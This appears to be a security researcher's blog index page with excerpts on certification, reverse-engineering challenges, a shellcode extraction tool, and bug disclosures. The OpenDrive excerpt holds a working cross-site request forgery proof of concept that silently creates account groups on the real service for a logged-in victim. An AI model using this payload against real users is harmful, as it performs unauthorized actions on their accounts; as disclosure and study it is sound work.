Author: Osanda Malith Jayathissa

My Journey into eWPT

Last year I thought of getting certified in the field of web application security since I haven’t done any certifications before. I researched about the current certifications in the market and found out most of them are just answering few MCQs and getting certified, but unfortunately those are highly accepted by different organizations. But when it comes to the info sec industry there’s a bunch of good certifications I had in mind to complete someday. So considering my budget, time and resources I thought of taking eLearnSecurity’s eWPT certification. This certification is highly hands-on and a fully practical penetration test based exam. When it comes to the industry it’s hard to prove we know something, so I think I did a better choice in taking a certification in the field which I have experience since small age. Apart from that before I loose my teens I wanted to get certified 😉
(more…)

Shellcode Extractor

This tool will extract the opcodes from the .text section and display in different hex formats for different syntaxes. Works only with valid PE files. Coded in C++Builder XE5.

Download: https://github.com/OsandaMalith/ShellCode-Extractor/releases

View post on imgur.com

2014 Flare On Challenge 2

You can download the challenge from here : http://www.flare-on.com/files/C2.zip

The zip file contains a html file and an image as the logo of the html file inside the img folder.

View post on imgur.com

View post on imgur.com

If we open the image in a hex editor we can see at the end it contains PHP code.

View post on imgur.com


(more…)

2014 Flare On Challenge 1

You can download the challenge from here: http://www.flare-on.com/files/C1.exe

As we run the application we get this.

View post on imgur.com

When we click on decode the we get this encrypted string.

View post on imgur.com


(more…)

Hiding Data Inside Memory Addresses

This is a small finding I found while I was experimenting on pointers in C. Usually in C the arithmetic on pointers depend on the size of the data types. If we initialize a int variable, the compiler will allocate 4 bytes in memory since its 32 bits. I assume you are well aware of these basics in C 🙂 I wanted to store data inside the empty addresses allocated by int data type. This is a bit challenging in a high level programming language. Of course using inline assembly I could have achieved this. But I wanted to achieve this using native C operators.
To understand this let’s begin from a simple approach.

1
2
3
4
5
6
7
8
9
10
#include <stdio.h>
 
int main() {
unsigned int var  = 100;
unsigned int var2 = 200;
printf("%u\n",var);
printf("%u\n",var2);
}

(more…)

2015 in review

The WordPress.com stats helper monkeys prepared a 2015 annual report for this blog.

Here’s an excerpt:

Madison Square Garden can seat 20,000 people for a concert. This blog was viewed about 69,000 times in 2015. If it were a concert at Madison Square Garden, it would take about 3 sold-out performances for that many people to see it.

Click here to see the complete report.

Rootme No software breakpoints Cracking Challenge

Here is another very interesting challenge from Rootme. The title says ELF – no software breakpoints.

View post on imgur.com


Let’s run the file command and see.

% file ch20.bin
ch20.bin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

The executable seemed to be striped.
Next I examined the sections in file and the .text section starts at 0x08048080

View post on imgur.com

This is the disassembly of the text section. I spent some time trying to understand the logic. Well let’s see what this is 🙂
(more…)

Pwning OpenDrive Users

After a long time being away from bug hunting I randomly found these few bugs in the OpenDrive.com website.

If the attacker can run this code while the user is logged in he can create his own Groups in the users section. This is the proof of concept and you will see groups such as “pwned” being created.

XSRF in Creating Groups

View post on imgur.com

[code language=”html”]
<html>
<!– Discovered by @OsandaMalith–>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.opendrive.com/ajax", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "action=create-usergroup&group_name=pwned&group_max_storage=5120&group_bw_max=1024";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Click Here to Pwn" onclick="submitRequest();" />
</form>
</body>
</html>
[/code]
(more…)

Newbie Keygenning 1

This is a random very old crackme I found when I was bored with assignments, which is pretty easy and thought of sharing with you. Doing crackmes one by one 😀 Download: https://www.mediafire.com/?351rp7o9qmf97js

View post on imgur.com


After opening in Olly and checking the string references we can see the congratulations string.

View post on imgur.com


After following the string we see the following disassembly.

View post on imgur.com


(more…)

Informatica Reflected XSS

This is old vulnerability I found in Informatica and got fixed recently. Honestly I’ve been a bit away from bug hunting due to studies and all. Well, stay tuned, found some cool bugs in few sites and products. Will disclose shortly 🙂

View post on imgur.com

View post on imgur.com